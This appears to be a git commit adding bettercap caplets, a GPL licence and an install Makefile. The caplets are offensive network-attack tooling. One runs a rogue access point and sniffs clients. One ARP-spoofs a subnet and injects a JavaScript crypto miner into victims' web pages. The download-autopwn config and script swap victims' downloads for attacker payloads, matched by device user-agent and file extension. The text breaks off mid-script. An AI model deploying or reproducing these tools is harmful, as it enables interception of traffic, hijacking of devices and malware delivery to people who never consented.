commit 9be991b263d73ea797785efdb357a8268b2e0c33 Author: andatoshiki Date: Sun Aug 25 04:29:40 2024 -0700 init: inital commit for complete raw root sources of project codebases diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..855f24d --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +gitspoof/evil_git_repo diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 0000000..54c6296 --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,596 @@ +GNU GENERAL PUBLIC LICENSE +========================== + +Version 3, 29 June 2007 + +Copyright © 2007 Free Software Foundation, Inc. <> + +Everyone is permitted to copy and distribute verbatim copies of this license +document, but changing it is not allowed. + +## Preamble + +The GNU General Public License is a free, copyleft license for software and other +kinds of works. + +The licenses for most software and other practical works are designed to take away +your freedom to share and change the works. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change all versions of a +program--to make sure it remains free software for all its users. We, the Free +Software Foundation, use the GNU General Public License for most of our software; it +applies also to any other work released this way by its authors. You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not price. Our General +Public Licenses are designed to make sure that you have the freedom to distribute +copies of free software (and charge for them if you wish), that you receive source +code or can get it if you want it, that you can change the software or use pieces of +it in new free programs, and that you know you can do these things. + +To protect your rights, we need to prevent others from denying you these rights or +asking you to surrender the rights. Therefore, you have certain responsibilities if +you distribute copies of the software, or if you modify it: responsibilities to +respect the freedom of others. + +For example, if you distribute copies of such a program, whether gratis or for a fee, +you must pass on to the recipients the same freedoms that you received. You must make +sure that they, too, receive or can get the source code. And you must show them these +terms so they know their rights. + +Developers that use the GNU GPL protect your rights with two steps: (1) assert +copyright on the software, and (2) offer you this License giving you legal permission +to copy, distribute and/or modify it. + +For the developers' and authors' protection, the GPL clearly explains that there is +no warranty for this free software. For both users' and authors' sake, the GPL +requires that modified versions be marked as changed, so that their problems will not +be attributed erroneously to authors of previous versions. + +Some devices are designed to deny users access to install or run modified versions of +the software inside them, although the manufacturer can do so. This is fundamentally +incompatible with the aim of protecting users' freedom to change the software. The +systematic pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we have designed +this version of the GPL to prohibit the practice for those products. If such problems +arise substantially in other domains, we stand ready to extend this provision to +those domains in future versions of the GPL, as needed to protect the freedom of +users. + +Finally, every program is threatened constantly by software patents. States should +not allow patents to restrict development and use of software on general-purpose +computers, but in those that do, we wish to avoid the special danger that patents +applied to a free program could make it effectively proprietary. To prevent this, the +GPL assures that patents cannot be used to render the program non-free. + +The precise terms and conditions for copying, distribution and modification follow. + +## TERMS AND CONDITIONS + +### 0. Definitions. + +“This License” refers to version 3 of the GNU General Public License. + +“Copyright” also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + +“The Program” refers to any copyrightable work licensed under this +License. Each licensee is addressed as “you”. “Licensees” and +“recipients” may be individuals or organizations. + +To “modify” a work means to copy from or adapt all or part of the work in +a fashion requiring copyright permission, other than the making of an exact copy. The +resulting work is called a “modified version” of the earlier work or a +work “based on” the earlier work. + +A “covered work” means either the unmodified Program or a work based on +the Program. + +To “propagate” a work means to do anything with it that, without +permission, would make you directly or secondarily liable for infringement under +applicable copyright law, except executing it on a computer or modifying a private +copy. Propagation includes copying, distribution (with or without modification), +making available to the public, and in some countries other activities as well. + +To “convey” a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through a computer +network, with no transfer of a copy, is not conveying. + +An interactive user interface displays “Appropriate Legal Notices” to the +extent that it includes a convenient and prominently visible feature that (1) +displays an appropriate copyright notice, and (2) tells the user that there is no +warranty for the work (except to the extent that warranties are provided), that +licensees may convey the work under this License, and how to view a copy of this +License. If the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + +### 1. Source Code. + +The “source code” for a work means the preferred form of the work for +making modifications to it. “Object code” means any non-source form of a +work. + +A “Standard Interface” means an interface that either is an official +standard defined by a recognized standards body, or, in the case of interfaces +specified for a particular programming language, one that is widely used among +developers working in that language. + +The “System Libraries” of an executable work include anything, other than +the work as a whole, that (a) is included in the normal form of packaging a Major +Component, but which is not part of that Major Component, and (b) serves only to +enable use of the work with that Major Component, or to implement a Standard +Interface for which an implementation is available to the public in source code form. +A “Major Component”, in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system (if any) on which +the executable work runs, or a compiler used to produce the work, or an object code +interpreter used to run it. + +The “Corresponding Source” for a work in object code form means all the +source code needed to generate, install, and (for an executable work) run the object +code and to modify the work, including scripts to control those activities. However, +it does not include the work's System Libraries, or general-purpose tools or +generally available free programs which are used unmodified in performing those +activities but which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for the work, and +the source code for shared libraries and dynamically linked subprograms that the work +is specifically designed to require, such as by intimate data communication or +control flow between those subprograms and other parts of the work. + +The Corresponding Source need not include anything that users can regenerate +automatically from other parts of the Corresponding Source. + +The Corresponding Source for a work in source code form is that same work. + +### 2. Basic Permissions. + +All rights granted under this License are granted for the term of copyright on the +Program, and are irrevocable provided the stated conditions are met. This License +explicitly affirms your unlimited permission to run the unmodified Program. The +output from running a covered work is covered by this License only if the output, +given its content, constitutes a covered work. This License acknowledges your rights +of fair use or other equivalent, as provided by copyright law. + +You may make, run and propagate covered works that you do not convey, without +conditions so long as your license otherwise remains in force. You may convey covered +works to others for the sole purpose of having them make modifications exclusively +for you, or provide you with facilities for running those works, provided that you +comply with the terms of this License in conveying all material for which you do not +control copyright. Those thus making or running the covered works for you must do so +exclusively on your behalf, under your direction and control, on terms that prohibit +them from making any copies of your copyrighted material outside their relationship +with you. + +Conveying under any other circumstances is permitted solely under the conditions +stated below. Sublicensing is not allowed; section 10 makes it unnecessary. + +### 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + +No covered work shall be deemed part of an effective technological measure under any +applicable law fulfilling obligations under article 11 of the WIPO copyright treaty +adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention +of such measures. + +When you convey a covered work, you waive any legal power to forbid circumvention of +technological measures to the extent such circumvention is effected by exercising +rights under this License with respect to the covered work, and you disclaim any +intention to limit operation or modification of the work as a means of enforcing, +against the work's users, your or third parties' legal rights to forbid circumvention +of technological measures. + +### 4. Conveying Verbatim Copies. + +You may convey verbatim copies of the Program's source code as you receive it, in any +medium, provided that you conspicuously and appropriately publish on each copy an +appropriate copyright notice; keep intact all notices stating that this License and +any non-permissive terms added in accord with section 7 apply to the code; keep +intact all notices of the absence of any warranty; and give all recipients a copy of +this License along with the Program. + +You may charge any price or no price for each copy that you convey, and you may offer +support or warranty protection for a fee. + +### 5. Conveying Modified Source Versions. + +You may convey a work based on the Program, or the modifications to produce it from +the Program, in the form of source code under the terms of section 4, provided that +you also meet all of these conditions: + +* **a)** The work must carry prominent notices stating that you modified it, and giving a +relevant date. +* **b)** The work must carry prominent notices stating that it is released under this +License and any conditions added under section 7. This requirement modifies the +requirement in section 4 to “keep intact all notices”. +* **c)** You must license the entire work, as a whole, under this License to anyone who +comes into possession of a copy. This License will therefore apply, along with any +applicable section 7 additional terms, to the whole of the work, and all its parts, +regardless of how they are packaged. This License gives no permission to license the +work in any other way, but it does not invalidate such permission if you have +separately received it. +* **d)** If the work has interactive user interfaces, each must display Appropriate Legal +Notices; however, if the Program has interactive interfaces that do not display +Appropriate Legal Notices, your work need not make them do so. + +A compilation of a covered work with other separate and independent works, which are +not by their nature extensions of the covered work, and which are not combined with +it such as to form a larger program, in or on a volume of a storage or distribution +medium, is called an “aggregate” if the compilation and its resulting +copyright are not used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work in an aggregate +does not cause this License to apply to the other parts of the aggregate. + +### 6. Conveying Non-Source Forms. + +You may convey a covered work in object code form under the terms of sections 4 and +5, provided that you also convey the machine-readable Corresponding Source under the +terms of this License, in one of these ways: + +* **a)** Convey the object code in, or embodied in, a physical product (including a +physical distribution medium), accompanied by the Corresponding Source fixed on a +durable physical medium customarily used for software interchange. +* **b)** Convey the object code in, or embodied in, a physical product (including a +physical distribution medium), accompanied by a written offer, valid for at least +three years and valid for as long as you offer spare parts or customer support for +that product model, to give anyone who possesses the object code either (1) a copy of +the Corresponding Source for all the software in the product that is covered by this +License, on a durable physical medium customarily used for software interchange, for +a price no more than your reasonable cost of physically performing this conveying of +source, or (2) access to copy the Corresponding Source from a network server at no +charge. +* **c)** Convey individual copies of the object code with a copy of the written offer to +provide the Corresponding Source. This alternative is allowed only occasionally and +noncommercially, and only if you received the object code with such an offer, in +accord with subsection 6b. +* **d)** Convey the object code by offering access from a designated place (gratis or for +a charge), and offer equivalent access to the Corresponding Source in the same way +through the same place at no further charge. You need not require recipients to copy +the Corresponding Source along with the object code. If the place to copy the object +code is a network server, the Corresponding Source may be on a different server +(operated by you or a third party) that supports equivalent copying facilities, +provided you maintain clear directions next to the object code saying where to find +the Corresponding Source. Regardless of what server hosts the Corresponding Source, +you remain obligated to ensure that it is available for as long as needed to satisfy +these requirements. +* **e)** Convey the object code using peer-to-peer transmission, provided you inform +other peers where the object code and Corresponding Source of the work are being +offered to the general public at no charge under subsection 6d. + +A separable portion of the object code, whose source code is excluded from the +Corresponding Source as a System Library, need not be included in conveying the +object code work. + +A “User Product” is either (1) a “consumer product”, which +means any tangible personal property which is normally used for personal, family, or +household purposes, or (2) anything designed or sold for incorporation into a +dwelling. In determining whether a product is a consumer product, doubtful cases +shall be resolved in favor of coverage. For a particular product received by a +particular user, “normally used” refers to a typical or common use of +that class of product, regardless of the status of the particular user or of the way +in which the particular user actually uses, or expects or is expected to use, the +product. A product is a consumer product regardless of whether the product has +substantial commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + +“Installation Information” for a User Product means any methods, +procedures, authorization keys, or other information required to install and execute +modified versions of a covered work in that User Product from a modified version of +its Corresponding Source. The information must suffice to ensure that the continued +functioning of the modified object code is in no case prevented or interfered with +solely because modification has been made. + +If you convey an object code work under this section in, or with, or specifically for +use in, a User Product, and the conveying occurs as part of a transaction in which +the right of possession and use of the User Product is transferred to the recipient +in perpetuity or for a fixed term (regardless of how the transaction is +characterized), the Corresponding Source conveyed under this section must be +accompanied by the Installation Information. But this requirement does not apply if +neither you nor any third party retains the ability to install modified object code +on the User Product (for example, the work has been installed in ROM). + +The requirement to provide Installation Information does not include a requirement to +continue to provide support service, warranty, or updates for a work that has been +modified or installed by the recipient, or for the User Product in which it has been +modified or installed. Access to a network may be denied when the modification itself +materially and adversely affects the operation of the network or violates the rules +and protocols for communication across the network. + +Corresponding Source conveyed, and Installation Information provided, in accord with +this section must be in a format that is publicly documented (and with an +implementation available to the public in source code form), and must require no +special password or key for unpacking, reading or copying. + +### 7. Additional Terms. + +“Additional permissions” are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. Additional +permissions that are applicable to the entire Program shall be treated as though they +were included in this License, to the extent that they are valid under applicable +law. If additional permissions apply only to part of the Program, that part may be +used separately under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + +When you convey a copy of a covered work, you may at your option remove any +additional permissions from that copy, or from any part of it. (Additional +permissions may be written to require their own removal in certain cases when you +modify the work.) You may place additional permissions on material, added by you to a +covered work, for which you have or can give appropriate copyright permission. + +Notwithstanding any other provision of this License, for material you add to a +covered work, you may (if authorized by the copyright holders of that material) +supplement the terms of this License with terms: + +* **a)** Disclaiming warranty or limiting liability differently from the terms of +sections 15 and 16 of this License; or +* **b)** Requiring preservation of specified reasonable legal notices or author +attributions in that material or in the Appropriate Legal Notices displayed by works +containing it; or +* **c)** Prohibiting misrepresentation of the origin of that material, or requiring that +modified versions of such material be marked in reasonable ways as different from the +original version; or +* **d)** Limiting the use for publicity purposes of names of licensors or authors of the +material; or +* **e)** Declining to grant rights under trademark law for use of some trade names, +trademarks, or service marks; or +* **f)** Requiring indemnification of licensors and authors of that material by anyone +who conveys the material (or modified versions of it) with contractual assumptions of +liability to the recipient, for any liability that these contractual assumptions +directly impose on those licensors and authors. + +All other non-permissive additional terms are considered “further +restrictions” within the meaning of section 10. If the Program as you received +it, or any part of it, contains a notice stating that it is governed by this License +along with a term that is a further restriction, you may remove that term. If a +license document contains a further restriction but permits relicensing or conveying +under this License, you may add to a covered work material governed by the terms of +that license document, provided that the further restriction does not survive such +relicensing or conveying. + +If you add terms to a covered work in accord with this section, you must place, in +the relevant source files, a statement of the additional terms that apply to those +files, or a notice indicating where to find the applicable terms. + +Additional terms, permissive or non-permissive, may be stated in the form of a +separately written license, or stated as exceptions; the above requirements apply +either way. + +### 8. Termination. + +You may not propagate or modify a covered work except as expressly provided under +this License. Any attempt otherwise to propagate or modify it is void, and will +automatically terminate your rights under this License (including any patent licenses +granted under the third paragraph of section 11). + +However, if you cease all violation of this License, then your license from a +particular copyright holder is reinstated (a) provisionally, unless and until the +copyright holder explicitly and finally terminates your license, and (b) permanently, +if the copyright holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + +Moreover, your license from a particular copyright holder is reinstated permanently +if the copyright holder notifies you of the violation by some reasonable means, this +is the first time you have received notice of violation of this License (for any +work) from that copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + +Termination of your rights under this section does not terminate the licenses of +parties who have received copies or rights from you under this License. If your +rights have been terminated and not permanently reinstated, you do not qualify to +receive new licenses for the same material under section 10. + +### 9. Acceptance Not Required for Having Copies. + +You are not required to accept this License in order to receive or run a copy of the +Program. Ancillary propagation of a covered work occurring solely as a consequence of +using peer-to-peer transmission to receive a copy likewise does not require +acceptance. However, nothing other than this License grants you permission to +propagate or modify any covered work. These actions infringe copyright if you do not +accept this License. Therefore, by modifying or propagating a covered work, you +indicate your acceptance of this License to do so. + +### 10. Automatic Licensing of Downstream Recipients. + +Each time you convey a covered work, the recipient automatically receives a license +from the original licensors, to run, modify and propagate that work, subject to this +License. You are not responsible for enforcing compliance by third parties with this +License. + +An “entity transaction” is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an organization, or +merging organizations. If propagation of a covered work results from an entity +transaction, each party to that transaction who receives a copy of the work also +receives whatever licenses to the work the party's predecessor in interest had or +could give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if the predecessor +has it or can get it with reasonable efforts. + +You may not impose any further restrictions on the exercise of the rights granted or +affirmed under this License. For example, you may not impose a license fee, royalty, +or other charge for exercise of rights granted under this License, and you may not +initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging +that any patent claim is infringed by making, using, selling, offering for sale, or +importing the Program or any portion of it. + +### 11. Patents. + +A “contributor” is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The work thus +licensed is called the contributor's “contributor version”. + +A contributor's “essential patent claims” are all patent claims owned or +controlled by the contributor, whether already acquired or hereafter acquired, that +would be infringed by some manner, permitted by this License, of making, using, or +selling its contributor version, but do not include claims that would be infringed +only as a consequence of further modification of the contributor version. For +purposes of this definition, “control” includes the right to grant patent +sublicenses in a manner consistent with the requirements of this License. + +Each contributor grants you a non-exclusive, worldwide, royalty-free patent license +under the contributor's essential patent claims, to make, use, sell, offer for sale, +import and otherwise run, modify and propagate the contents of its contributor +version. + +In the following three paragraphs, a “patent license” is any express +agreement or commitment, however denominated, not to enforce a patent (such as an +express permission to practice a patent or covenant not to sue for patent +infringement). To “grant” such a patent license to a party means to make +such an agreement or commitment not to enforce a patent against the party. + +If you convey a covered work, knowingly relying on a patent license, and the +Corresponding Source of the work is not available for anyone to copy, free of charge +and under the terms of this License, through a publicly available network server or +other readily accessible means, then you must either (1) cause the Corresponding +Source to be so available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner consistent with +the requirements of this License, to extend the patent license to downstream +recipients. “Knowingly relying” means you have actual knowledge that, but +for the patent license, your conveying the covered work in a country, or your +recipient's use of the covered work in a country, would infringe one or more +identifiable patents in that country that you have reason to believe are valid. + +If, pursuant to or in connection with a single transaction or arrangement, you +convey, or propagate by procuring conveyance of, a covered work, and grant a patent +license to some of the parties receiving the covered work authorizing them to use, +propagate, modify or convey a specific copy of the covered work, then the patent +license you grant is automatically extended to all recipients of the covered work and +works based on it. + +A patent license is “discriminatory” if it does not include within the +scope of its coverage, prohibits the exercise of, or is conditioned on the +non-exercise of one or more of the rights that are specifically granted under this +License. You may not convey a covered work if you are a party to an arrangement with +a third party that is in the business of distributing software, under which you make +payment to the third party based on the extent of your activity of conveying the +work, and under which the third party grants, to any of the parties who would receive +the covered work from you, a discriminatory patent license (a) in connection with +copies of the covered work conveyed by you (or copies made from those copies), or (b) +primarily for and in connection with specific products or compilations that contain +the covered work, unless you entered into that arrangement, or that patent license +was granted, prior to 28 March 2007. + +Nothing in this License shall be construed as excluding or limiting any implied +license or other defenses to infringement that may otherwise be available to you +under applicable patent law. + +### 12. No Surrender of Others' Freedom. + +If conditions are imposed on you (whether by court order, agreement or otherwise) +that contradict the conditions of this License, they do not excuse you from the +conditions of this License. If you cannot convey a covered work so as to satisfy +simultaneously your obligations under this License and any other pertinent +obligations, then as a consequence you may not convey it at all. For example, if you +agree to terms that obligate you to collect a royalty for further conveying from +those to whom you convey the Program, the only way you could satisfy both those terms +and this License would be to refrain entirely from conveying the Program. + +### 13. Use with the GNU Affero General Public License. + +Notwithstanding any other provision of this License, you have permission to link or +combine any covered work with a work licensed under version 3 of the GNU Affero +General Public License into a single combined work, and to convey the resulting work. +The terms of this License will continue to apply to the part which is the covered +work, but the special requirements of the GNU Affero General Public License, section +13, concerning interaction through a network will apply to the combination as such. + +### 14. Revised Versions of this License. + +The Free Software Foundation may publish revised and/or new versions of the GNU +General Public License from time to time. Such new versions will be similar in spirit +to the present version, but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Program specifies that +a certain numbered version of the GNU General Public License “or any later +version” applies to it, you have the option of following the terms and +conditions either of that numbered version or of any later version published by the +Free Software Foundation. If the Program does not specify a version number of the GNU +General Public License, you may choose any version ever published by the Free +Software Foundation. + +If the Program specifies that a proxy can decide which future versions of the GNU +General Public License can be used, that proxy's public statement of acceptance of a +version permanently authorizes you to choose that version for the Program. + +Later license versions may give you additional or different permissions. However, no +additional obligations are imposed on any author or copyright holder as a result of +your choosing to follow a later version. + +### 15. Disclaimer of Warranty. + +THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER +EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE +QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE +DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +### 16. Limitation of Liability. + +IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY +COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS +PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, +INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE +OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE +WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + +### 17. Interpretation of Sections 15 and 16. + +If the disclaimer of warranty and limitation of liability provided above cannot be +given local legal effect according to their terms, reviewing courts shall apply local +law that most closely approximates an absolute waiver of all civil liability in +connection with the Program, unless a warranty or assumption of liability accompanies +a copy of the Program in return for a fee. + +END OF TERMS AND CONDITIONS + +## How to Apply These Terms to Your New Programs + +If you develop a new program, and you want it to be of the greatest possible use to +the public, the best way to achieve this is to make it free software which everyone +can redistribute and change under these terms. + +To do so, attach the following notices to the program. It is safest to attach them +to the start of each source file to most effectively state the exclusion of warranty; +and each file should have at least the “copyright” line and a pointer to +where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + +If the program does terminal interaction, make it output a short notice like this +when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type 'show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type 'show c' for details. + +The hypothetical commands 'show w' and 'show c' should show the appropriate parts of +the General Public License. Of course, your program's commands might be different; +for a GUI interface, you would use an “about box”. + +You should also get your employer (if you work as a programmer) or school, if any, to +sign a “copyright disclaimer” for the program, if necessary. For more +information on this, and how to apply and follow the GNU GPL, see +<>. + +The GNU General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may consider it +more useful to permit linking proprietary applications with the library. If this is +what you want to do, use the GNU Lesser General Public License instead of this +License. But first, please read +<>. diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..1aba117 --- /dev/null +++ b/Makefile @@ -0,0 +1,4 @@ +install: + @mkdir -p /usr/local/share/bettercap/caplets + @cp -rf * /usr/local/share/bettercap/caplets/ + @cp *.* /usr/local/share/bettercap/caplets/ diff --git a/ap.cap b/ap.cap new file mode 100644 index 0000000..635c9a7 --- /dev/null +++ b/ap.cap @@ -0,0 +1,24 @@ +# interface to use to create the AP +set wifi.ap.interface wlx00c0ca96e4b2 +# interface for upstream connectivity, comment to disable +set wifi.ap.upstream wlp1s0 +# comment to create a free access point +set wifi.ap.passphrase 12345678 + +# enable the ap +wifi.ap on + +# wait 2 seconds then set the session interface to the AP one +sleep 2 +iface wlx00c0ca96e4b2 + +set net.sniff.local true +set net.sniff.verbose false +set net.sniff.filter not arp and not udp port 53 + +# start recon for clients +net.recon on +# sniff +net.sniff on +# run the https-ui caplet because it's cool +https-ui diff --git a/crypto-miner/crypto-miner.cap b/crypto-miner/crypto-miner.cap new file mode 100644 index 0000000..b663a0f --- /dev/null +++ b/crypto-miner/crypto-miner.cap @@ -0,0 +1,27 @@ +# this module lets you inject a javascript crypto miner +# +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet crypto-miner.cap -eval "set arp.spoof.targets 192.168.1.64" + + +# set the name of the Miner: coinhive, cryptoloot or coinimp +set cryptominer.name coinhive + +# set the key of the Miner +set cryptominer.key 123456789 + +# inject js miner +set http.proxy.script crypto-miner.js + +# uncomment if you want sslstrip enabled +#set http.proxy.sslstrip true + +# redirect http traffic to a proxy +http.proxy on + +# wait for everything to start properly +sleep 1 + +# make sure probing is off as it conflicts with arp spoofing +arp.spoof on diff --git a/crypto-miner/crypto-miner.js b/crypto-miner/crypto-miner.js new file mode 100644 index 0000000..1aa6321 --- /dev/null +++ b/crypto-miner/crypto-miner.js @@ -0,0 +1,40 @@ +var green = "\033[32m", + reset = "\033[0m" + +function onLoad() { + logStr = "Javascript Crypto Miner loaded.\n" + + "\n Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset + + "\n Targets: " + green + env["arp.spoof.targets"] + reset + "\n" + log(logStr); +} + +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + switch(env["cryptominer.name"]) { + case "coinhive": + res.Body = body.replace( + '', + '', + '' + ); + break; + case "cryptoloot": + res.Body = body.replace( + '', + '', + '' + ); + break; + case "coinimp": + res.Body = body.replace( + '', + '', + '' + ); + break; + } + } + } +} diff --git a/download-autopwn/README.md b/download-autopwn/README.md new file mode 100644 index 0000000..0948c4c --- /dev/null +++ b/download-autopwn/README.md @@ -0,0 +1,185 @@ +

+ + +### caplets/download-autopwn.cap + +Everything is configurable in the **download-autopwn.cap** file. + +```sh +# documentation can be found at https://github.com/bettercap/caplets/blob/master/download-autopwn/README.md +# +# this module lets you intercept very specific download requests and replaces the payload with one of your choice +# +# in order for a download to get intercepted: +# 1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value +# 2. the requested file must match one of the downloadautopwn.extensions.x file extensions +# +# you can find the downloadautopwn.devices in the caplets/download-autopwn/ folder (you can add your own) +# + +# choose the devices from which downloads get pwned (enter the dir names of choice from caplets/download-autopwn/) +# (or feel free to add your own) +set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox + +# choose the regexp value that the victim's User-Agent has to match +# (feel free to add your own) +set downloadautopwn.useragent.android Android +set downloadautopwn.useragent.ios iPad|iPhone|iPod +set downloadautopwn.useragent.linux Linux +set downloadautopwn.useragent.macos Intel Mac OS X 10_ +set downloadautopwn.useragent.ps4 PlayStation 4 +set downloadautopwn.useragent.windows Windows|WOW64 +set downloadautopwn.useragent.xbox Xbox + +# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in caplets/download-autopwn/.../) +# (again, you can add as many as you want) +# make sure the payload files exist and that they are all named "payload" (for example: payload.exe) +set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip +set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip +set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip +set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip +set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip +set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip +set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip + +# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false) +set downloadautopwn.resizepayloads true + +# set download-autopwn.js as proxy script +set http.proxy.script caplets/download-autopwn.js +# uncomment if you want sslstrip enabled +# set http.proxy.sslstrip true +# start proxy +http.proxy on + +# wait for everything to start properly +sleep 1 + +# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing) +# arp.spoof on +``` + +
+ +The `downloadautopwn.devices` variable accepts comma separated values. +
+These values are the folder names inside the **caplets/download-autopwn/** directory. + +
+ +The `downloadautopwn.useragent.x` variables accept a regular expression value (where `x` is the device name). +
+The victim's User-Agent string has to match this regex value. + +
+ +The `downloadautopwn.extensions.x` variables accept comma separated file extensions that are present in the device's folder (where `x` is the device name). +
+These files must be present in the device's folder, and they must be called `payload` (for example: `payload.exe`). + +
+ +The `downloadautopwn.resizepayloads` variable accepts a boolean value (default=false). +
+If this value is set to true, your payloads will be resized to match the requested file's size (unless your payload is bigger or equal to the requested file's size). + +
+ +### caplets/download-autopwn.js + +No changes should have to be made in the **download-autopwn.js** file. + +```javascript +var targets = {} + +var nullbyte = "\u0000" + +var green = "\033[32m", + boldRed = "\033[1;31m", + onRed = "\033[41m", + reset = "\033[0m", + redLine = "\n " + onRed + " " + reset + +function onLoad() { + devices = env("downloadautopwn.devices").split(",") + logStr = "" + for (var i = 0; i < devices.length; i++) { + item = { + "device": devices[i], + "useragent": env("downloadautopwn.useragent." + devices[i]), + "extensions": env("downloadautopwn.extensions." + devices[i]).toLowerCase().split(",") + } + targets[i] = item + logStr += "\n " + green + targets[i]["device"] + reset + + "\n User-Agent: " + targets[i]["useragent"] + + "\n Extensions: " + targets[i]["extensions"] + "\n" + } + log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr) +} + +function onResponse(req, res) { + // First of all check whether the requested path might have an extension (to save cpu) + var requestedFileName = req.Path.replace(/.*\//g, "") + if ( requestedFileName.indexOf(".") != -1 ) { + var userAgent = req.GetHeader("User-Agent", ""), + extension, + headerCount = req.Headers.length + // Iterate through targets + for ( var t = 0; t < Object.keys(targets).length; t++ ) { + // Check if User-Agent is a target + regex = new RegExp(targets[t]["useragent"]) + if ( userAgent.match(regex) ) { + // Iterate through target extensions + for (var e = 0; e < targets[t]["extensions"].length; e++) { + // Check if requested path contains a targeted extension + // function endsWith() could be a nice simplification here + if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) { + extension = targets[t]["extensions"][e] + // Autopwn + logStr = "\n" + redLine + " Autopwning download request from " + boldRed + req.Client.IP + reset + + redLine + + redLine + " Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + + redLine + + redLine + " Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..." + // Check requested file size + requestedFile = res.ReadBody() + requestedFileSize = requestedFile.length + payload = readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension) + payloadSize = payload.length + logStr += redLine + " The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes" + + redLine + " The raw size of your payload is " + boldRed + payloadSize + reset + " bytes" + redLine + // Append nullbytes to payload if resizing is enabled and if requested file is larger than payload + if ( env("downloadautopwn.resizepayloads") == "true" && requestedFileSize > payloadSize ) { + logStr += redLine + " Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..." + sizeDifference = requestedFileSize - payloadSize + nullbyteString = Array(sizeDifference + 1).join(nullbyte) + payload += nullbyteString + } + // Set 